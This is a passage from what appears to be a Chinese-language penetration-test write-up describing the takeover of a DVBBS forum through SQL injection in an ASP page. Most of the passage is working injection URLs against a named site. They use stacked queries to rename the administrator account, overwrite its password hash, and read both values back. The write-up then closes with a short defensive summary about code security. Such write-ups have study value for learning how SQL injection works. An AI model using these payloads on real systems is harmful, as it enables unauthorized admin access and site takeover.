admin set username='admin' where username='01city'--
查看一下：
http://www.loveyou.com/type.asp?id=(select username from admin)--
更改成功，后台管理员现在已变成：admin 接下来更改密码，提交：
http://www.loveyou.com/type.asp?id=6;update admin set password='49ba59abbe56e057' where username='admin'--
查看一下：
http://www.loveyou.com/type.asp?id=(select password from admin)--
更改成功，后台管理员密码已经变成：49ba59abbe56e057

到这里为止，动网已彻底沦陷。你可以用admin登陆前台然后再用相同的密码进后台管理了。

四、总结
就这样并不算太艰难的实现了对动网的控制。通过这次善意的渗透测试，也暴露出SQL INJECTION攻击的可怕性。而对于IIS+ASP+SQL2000的虚拟主机来说简直就是防不胜防。只要主机上有一个SQL注入点的话，动网就将面临灭顶之灾了。而其实从服务器庞大的网站程序中找一个这样的SQL注入点并不算难事.正应征了一句老话：千里之堤，溃于蚁穴。所以防范这样的攻击的最好办法是加强程序代码的安全性。安全是个整体，任何细微的错误都有可能导致严重后果。